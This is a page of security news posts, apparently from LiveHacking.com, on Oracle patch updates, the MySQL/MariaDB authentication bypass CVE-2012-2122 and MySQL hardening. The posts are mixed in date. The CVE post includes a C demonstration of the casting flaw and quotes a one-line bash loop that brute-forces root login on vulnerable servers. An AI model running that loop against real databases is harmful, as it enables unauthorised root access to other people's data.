September 27, 2016

Oracle fixes 113 security vulnerabilities, 20 just in Java

(LiveHacking.Com) – Oracle has released a mammoth set of patches to address 113 security-related problems across a wide range of its products. The patch release, which Oracle refers to as a Critical Patch Update (CPU), contains 113 new security fixes for a wide range of product families including: Oracle Database, Oracle Fusion Middleware, Oracle Hyperion, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite, Oracle PeopleSoft Enterprise, Oracle Siebel CRM, Oracle Industry Applications, Oracle Java SE, Oracle Linux and Virtualization, Oracle MySQL, and Oracle and Sun Systems Products Suite.

Although all of the patches from Oracle should be considered important, the set that will get the most attention are the latest patches for Java. Oracle patched 20 vulnerabilities in Java. Eight of the 20 vulnerabilities could allow a hacker to completely compromise a target client. These vulnerabilities are described as remote exploits that do not require authentication. In total the CPU provides fixes for 17 Java SE client vulnerabilities, 1 for a JSSE vulnerability affecting client and server, and 2 vulnerabilities affecting Java client and server.

Oracle also points out that Windows XP users should upgrade to a new operating system. The security advisory says that “running unsupported operating systems, particularly one as prevalent as Windows XP, create a very significant risk to users of these systems as vulnerabilities are widely known, exploit kits routinely available, and security patches no longer provided by the OS provider.”

This CPU also includes 5 fixes for the Oracle Database, 29 new security fixes for Oracle Fusion Middleware, 5 fixes for Oracle E-Business Suite, and 3 for the Oracle Sun Systems Products Suite. According to the United States Computer Emergency Readiness Team (US-CERT), the update also includes 15 patches for Oracle Virtualization products and 10 fixes for MySQL.

“Critical Patch Update fixes are intended to address significant security vulnerabilities in Oracle products and also include code fixes that are prerequisites for the security fixes. As a result, Oracle recommends that this Critical Patch Update be applied as soon as possible by customers using the affected products,” wrote Eric Maurice on Oracle’s security blog.

Oracle releases Critical Patch Updates the Tuesday closest to the 17th day of January, April, July and October. The next CPU is due on 14 October 2014.

Rapid 7 releases MySQL authentication bypass vulnerability scanning tool

(LiveHacking.Com) – Rapid 7, the people behind Metasploit, have released a free scanning tool which can probe all the MySQL servers on a network and see if any of them are vulnerable to the MySQL authentication bypass vulnerability (CVE-2012-2122). The vulnerability, which was found in June, allows remote attackers to bypass MySQL authentication by repeatedly authenticating with the same incorrect password.

The problem is that when a user connects to MySQL (or MariaDB), a hash of the password is used and compared with the sent password. But, because of a casting bug and because of the way memcmp() is implemented in some libraries, sometimes the token and the expected password are considered equal even when they are not. The probability of hitting this bug and authenticating without the right password is about 1 in 256.

The new tool, ScanNow, will tell you if you have this MySQL vulnerability on your systems. It can scan a range of IP addresses and ports and create a report which can be saved for later reference.

Although the tool is free and scans an unlimited number of IPs, it ONLY checks for the MySQL CVE-2012-2122 vulnerability; it does not check for any other weaknesses.

Oracle to patch 88 new security vulnerabilities

(LiveHacking.Com) – Oracle has published a pre-release announcement for a Critical Patch Update that the company intends to make public on Tuesday, July 17, 2012. Oracle’s Critical Patch Updates are a collection of patches designed to address security vulnerabilities in the Oracle product range. July’s Critical Patch Update contains 88 security vulnerabilities.

The most significant products to be patched include Oracle Database 11g, Oracle Database 10g, GlassFish Enterprise Server, Solaris and MySQL. This Critical Patch Update contains four security fixes for the Oracle Database Server. Three of these vulnerabilities may be remotely exploitable without authentication; however, none of these fixes are applicable to client-only installations, i.e., installations that do not have the Oracle Database Server installed.

25 vulnerabilities will also be patched in the Oracle Sun Products Suite (which includes the GlassFish Enterprise Server and Solaris). 17 of these vulnerabilities may be remotely exploitable without authentication. Oracle will also fix 6 security problems in MySQL; however, none of these vulnerabilities may be remotely exploitable without authentication.

The full list of affected products is:

  • Oracle Database 11g Release 2, versions 11.2.0.2, 11.2.0.3
  • Oracle Database 11g Release 1, version 11.1.0.7
  • Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4, 10.2.0.5
  • Oracle Secure Backup, version 10.3.0.3, 10.4.0.1
  • Oracle Fusion Middleware 11g Release 2, version 11.1.2.0
  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.5, 11.1.1.6
  • Oracle Application Server 10g Release 3, version 10.1.3.5
  • Oracle Identity Management 10g, version 10.1.4.3
  • Hyperion BI+, version 11.1.1.x
  • Oracle JRockit versions, R28.2.3 and earlier, R27.7.2 and earlier
  • Oracle Map Viewer, versions 10.1.3.1, 11.1.1.5, 11.1.1.6
  • Oracle Outside In Technology, versions 8.3.5, 8.3.7
  • Enterprise Manager Plugin for Database 12c Release 1, versions 12.1.0.1, 12.1.0.2
  • Enterprise Manager Grid Control 11g Release 1, version 11.1.0.1
  • Enterprise Manager Grid Control 10g Release 1, version 10.2.0.5
  • Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.6, 12.1.1, 12.1.2, 12.1.3
  • Oracle E-Business Suite Release 11i, version 11.5.10.2
  • Oracle Transportation Management, versions 5.5.06, 6.0, 6.1, 6.2
  • Oracle AutoVue, versions 20.0.2, 20.1
  • Oracle PeopleSoft Enterprise HRMS, versions 9.0, 9.1
  • Oracle PeopleSoft Enterprise PeopleTools, versions 8.50, 8.51, 8.52
  • Oracle Siebel CRM, versions 8.1.1, 8.2.2
  • Oracle Clinical Remote Data Capture Option, versions 4.6, 4.6.2, 4.6.3
  • Oracle Sun Product Suite
  • Oracle MySQL Server, versions 5.1, 5.5

MySQL allows root access for every 1 in 256 login attempts without a password

(LiveHacking.Com) – A serious security vulnerability has been found in MySQL and MariaDB that allows a remote attacker to gain root access to a database if they attempt to log in (with the wrong password) around 256 times. The vulnerability, which was disclosed by Sergei Golubchik, the MariaDB Security Coordinator, occurs because some versions of memcmp() can return an arbitrary integer (outside of the normal -128 to 127 range).

The problem is that when a user connects to MySQL or MariaDB, a hash of the password is used and compared with the sent password. But, because of a casting bug, sometimes the token and the expected password are considered equal even when they are not. This can happen if memcmp() returns a non-zero value that the cast then collapses to zero. Because the authentication protocol uses random strings, the probability of hitting this bug is about 1 in 256.
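The casting bug described above (and in the Rapid 7 item earlier on this page) is easiest to see in code. The following is an added example written for this page, not code from MySQL, MariaDB or glibc: memcmp_wordwise() is a constructed stand-in for an optimised memcmp() that returns a raw word difference rather than -1/0/1, check_scramble_vulnerable() mirrors the shape of the flawed check (an int returned through a one-byte my_bool), and check_scramble_fixed() normalises the result to 0/1 before it is narrowed. The hash bytes are constructed values, and HASH_LEN, the function names and the word-wise comparison model are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HASH_LEN 20            /* length of a SHA-1 digest, as used by the scramble check */
typedef char my_bool;          /* MySQL's my_bool is a plain char: an int stored here loses its upper bits */

/* Constructed model of an optimised memcmp(): compares 32-bit words and returns
   the raw word difference, so the result can be any int, not just -1/0/1.
   This is NOT glibc code; it only reproduces the property the advisory
   describes (return values outside the -128..127 range). */
static int memcmp_wordwise(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa = ((uint32_t)a[i] << 24) | ((uint32_t)a[i + 1] << 16) |
                      ((uint32_t)a[i + 2] << 8) | a[i + 3];
        uint32_t wb = ((uint32_t)b[i] << 24) | ((uint32_t)b[i + 1] << 16) |
                      ((uint32_t)b[i + 2] << 8) | b[i + 3];
        if (wa != wb)
            return (int)(wa - wb);   /* low byte equals (a[i+3] - b[i+3]) mod 256 */
    }
    for (; i < n; i++)
        if (a[i] != b[i])
            return (int)a[i] - (int)b[i];
    return 0;
}

/* Vulnerable shape: the int from memcmp() is returned through my_bool (char).
   Any multiple of 256 collapses to 0, which the caller reads as "hash matches". */
static my_bool check_scramble_vulnerable(const unsigned char *expected, const unsigned char *got)
{
    return (my_bool)memcmp_wordwise(expected, got, HASH_LEN);
}

/* Fixed shape: compare against zero while the value is still an int,
   so only a genuine match yields 0. */
static my_bool check_scramble_fixed(const unsigned char *expected, const unsigned char *got)
{
    return memcmp_wordwise(expected, got, HASH_LEN) != 0;
}

typedef my_bool (*check_fn)(const unsigned char *, const unsigned char *);

/* Present 256 wrong hashes (byte 0 always wrong, byte 3 swept over all values)
   and count how many the check accepts, i.e. for which it returns 0. */
static int count_false_accepts(check_fn check)
{
    unsigned char expected[HASH_LEN], candidate[HASH_LEN];
    int accepts = 0;
    for (int i = 0; i < HASH_LEN; i++)
        expected[i] = (unsigned char)(i * 37 + 11);   /* constructed stored hash */
    for (int v = 0; v < 256; v++) {
        memcpy(candidate, expected, HASH_LEN);
        candidate[0] ^= 0x01;                          /* guarantees a mismatch */
        candidate[3] = (unsigned char)v;               /* sweep the byte that lands in the low 8 bits */
        if (check(expected, candidate) == 0)
            accepts++;
    }
    return accepts;
}

int main(void)
{
    printf("vulnerable check accepted %d of 256 wrong hashes\n",
           count_false_accepts(check_scramble_vulnerable));
    printf("fixed check accepted %d of 256 wrong hashes\n",
           count_false_accepts(check_scramble_fixed));
    return 0;
}
```

Under this model the vulnerable check accepts exactly one of the 256 wrong hashes (the one whose swept byte happens to match, so the word difference is a multiple of 256), while the fixed check accepts none. The same narrowing does not bite when memcmp() only ever returns -1, 0 or 1, which is why the builtin and BSD implementations mentioned further down are safe and only the implementations that return wider differences are affected.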

HD Moore, creator of Metasploit, has provided a simple one-line bash script which will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Of course to run the script you need to have shell access to the machine in question. All MySQL and MariaDB versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not affected. Neither are MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23.

Some good news

This is of course a massive security hole and Moore reckons that about 50 percent of Internet servers are vulnerable to the attack. However, on systems which don’t open the MySQL port to the Internet, attackers won’t be able to access the MySQL database at all. Also, many versions of Linux aren’t vulnerable due to the version of memcmp() they use. Since memcmp is part of the standard C library there are a variety of implementations. The gcc builtin version of memcmp() is safe, and memcmp() in BSD’s libc is also safe. However, Linux distributions that use glibc with SSE optimizations are not safe.

This means that the following versions of Linux are vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log
  • Debian Unstable 64-bit 5.5.23-2
  • Fedora
  • Arch Linux

It is worth noting that official builds of MySQL and MariaDB (including the Windows versions) are not vulnerable and that Red Hat Enterprise Linux 4, 5, and 6 and CentOS are also unaffected. Also the 32-bit versions of Ubuntu are not affected.

Oracle Releases 88 New Security Fixes

(LiveHacking.Com) – Oracle has released a massive security update to fix 88 security vulnerabilities many of which are remote code execution issues that can be exploited without user authentication. The update affects a whole range of Oracle products including Oracle Database 10g and 11g, Oracle JDeveloper, Oracle PeopleSoft Enterprise, Solaris and MySQL.

Oracle Database
Among the patches are six security fixes for the Oracle Database Server. Three of these vulnerabilities may be remotely exploitable without authentication (meaning that they can be exploited over a network without the need for a username and password). One of these fixes is applicable to client-only installations (in other words, installations that do not have the Oracle Database Server installed).

Solaris
The Oracle update includes 15 new security fixes for the Oracle Sun Products Suite. Five of these vulnerabilities may be remotely exploitable without authentication. Eight of the fixes are for Solaris and cover Solaris 8, 9, 10 and 11. There are also fixes for the GlassFish Enterprise Server, which has two remotely exploitable vulnerabilities.

MySQL
MySQL has also been updated. There are six new security fixes but none of these vulnerabilities are remotely exploitable without authentication.

The Rest

  • 11 new security fixes for Oracle Fusion Middleware. 9 of these vulnerabilities may be remotely exploitable without authentication.
  • 6 new security fixes for Oracle Enterprise Manager Grid Control. 4 of these vulnerabilities may be remotely exploitable without authentication.
  • 4 new security fixes for the Oracle E-Business Suite. All of these vulnerabilities may be remotely exploitable without authentication.
  • 5 new security fixes for the Oracle Supply Chain Products Suite. 4 of these vulnerabilities may be remotely exploitable without authentication.
  • 15 new security fixes for Oracle PeopleSoft Products. 1 of these vulnerabilities may be remotely exploitable without authentication.
  • 2 new security fixes for Oracle Industry Applications.
  • 17 new security fixes for Oracle Financial Services Software. 1 of these vulnerabilities may be remotely exploitable without authentication.
  • 1 new security fix for the Oracle Primavera Products Suite. This vulnerability is remotely exploitable without authentication.

Oracle Fixes 78 Vulnerabilities But Questions Arise About Fundamental Flaws in its Flagship Database Product

(LiveHacking.Com) – Oracle has released 78 security fixes, for its flagship database software, Fusion Middleware, e-Business Suite, Supply Chain, PeopleSoft, JDEdwards and Sun products, as part of January’s Critical Patch Update (CPU). Included were two fixes for the Oracle Database Server, seventeen for Oracle Sun products, three for Oracle Virtualization and a massive 27 in Oracle MySQL. Only 16 of the 78 fixes are considered critical, or could be remotely exploited without authentication.

“Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.” said Oracle in the advisory.

The highest scored vulnerabilities, under the Common Vulnerability Scoring Standard (CVSS), are found in the Solaris operating system. The first is a denial of service bug and the second a Kerberos issue.

Oracle also patched MySQL Server 27 times, including one vulnerability in the MySQL protocol that allows a remote attacker to significantly affect the availability of the database. Another, higher-rated vulnerability, while not remotely exploitable without authentication, could both affect availability and potentially expose the confidentiality of data in the database. Some pundits are accusing Oracle of “throwing in the towel” on patching its flagship database as it received only two patches compared to MySQL’s 27.

However, now that the CPU has been issued, InfoWorld has published a story about “a flaw in Oracle’s flagship database software that could have serious repercussions for Oracle database customers, potentially compromising the security and stability of Oracle database systems.” When they contacted Oracle about the flaw they were asked, in the interest of security, to withhold the story until Oracle had time to develop and test patches that addressed the flaw.


Oracle to Patch 78 Security Vulnerabilities Across Hundreds of its Products

(LiveHacking.Com) – Oracle has published a Critical Patch Update pre-release announcement where it outlines its intention to patch 78 security vulnerabilities across hundreds of its products. Scheduled for Tuesday, January 17, 2012, the jumbo set of patches affects products such as Oracle Database (10g and 11g), VirtualBox and MySQL.

For Oracle Database there are two security fixes, one of which may be remotely exploitable without authentication. This Critical Patch Update also contains three new security fixes for Oracle VM VirtualBox and Oracle Virtual Desktop Infrastructure (VDI); however, none of these vulnerabilities may be remotely exploitable without authentication. The MySQL patch set is larger, with 27 vulnerabilities scheduled to be patched. One of these vulnerabilities may be remotely exploitable without authentication.

Affected Products and Components

Security vulnerabilities addressed by Oracle’s Critical Patch Update affect the following products:

  • Oracle Database 11g Release 2, versions 11.2.0.2, 11.2.0.3
  • Oracle Database 11g Release 1, version 11.1.0.7
  • Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4, 10.2.0.5
  • Oracle Database 10g Release 1, version 10.1.0.5
  • Oracle Fusion Middleware 11g Release 1, versions 11.1.1.3.0, 11.1.1.4.0, 11.1.1.5.0
  • Oracle Application Server 10g Release 3, version 10.1.3.5.0
  • Oracle Outside In Technology, versions 8.3.5, 8.3.7
  • Oracle WebLogic Server, versions 9.2.4, 10.0.2, 11gR1 (10.3.3, 10.3.4, 10.3.5)
  • Oracle E-Business Suite Release 12, versions 12.1.2, 12.1.3
  • Oracle E-Business Suite Release 11i, version 11.5.10.2
  • Oracle Transportation Management, versions 5.5.06, 6.0, 6.1, 6.2
  • Oracle PeopleSoft Enterprise CRM, version 8.9
  • Oracle PeopleSoft Enterprise HCM, versions 8.9, 9.0, 9.1
  • Oracle PeopleSoft Enterprise PeopleTools, version 8.52
  • Oracle JDEdwards, version 8.98
  • Oracle Sun Product Suite
  • Oracle Sun Ray, version 5.3
  • Oracle VM VirtualBox, version 4.1
  • Oracle Virtual Desktop Infrastructure, version 3.2
  • Oracle MySQL Server, versions 5.0, 5.1, 5.5, 5.6

Hardening MySQL with mysql_secure_installation

A default Linux MySQL installation isn’t necessarily secure, but a hardening script called mysql_secure_installation comes with the MySQL server to increase the default security. To run it, open a terminal window and, as root (either using sudo or su -), type mysql_secure_installation and press Enter.

The script will guide you through several steps to lock down the MySQL installation.

The first step is to set the root password. By default a root password isn’t set, so to set it, hit Enter when asked for the current password (meaning blank) and then set the password as directed. Setting the root password ensures that nobody can log into the MySQL root account without the proper authorisation.

By default, a MySQL installation has an anonymous user, allowing anyone to log into MySQL without having to have a user account. The anonymous user is there just for testing. Type ‘y’ and hit Enter when asked to remove the anonymous user account.

To ensure that the root user cannot log in over the network (and to allow root connections only from the local machine), type ‘y’ and hit Enter when asked to disallow remote root logins.

By default, MySQL comes with a database named ‘test’ that anyone can access. This is also intended only for testing, and should be removed before moving into a production environment. To remove it type ‘y’ and hit Enter when asked.

And that is it: if you answered positively to all the steps above, your MySQL installation should now be secure.

Running mysql_secure_installation is recommended for all MySQL servers in production use.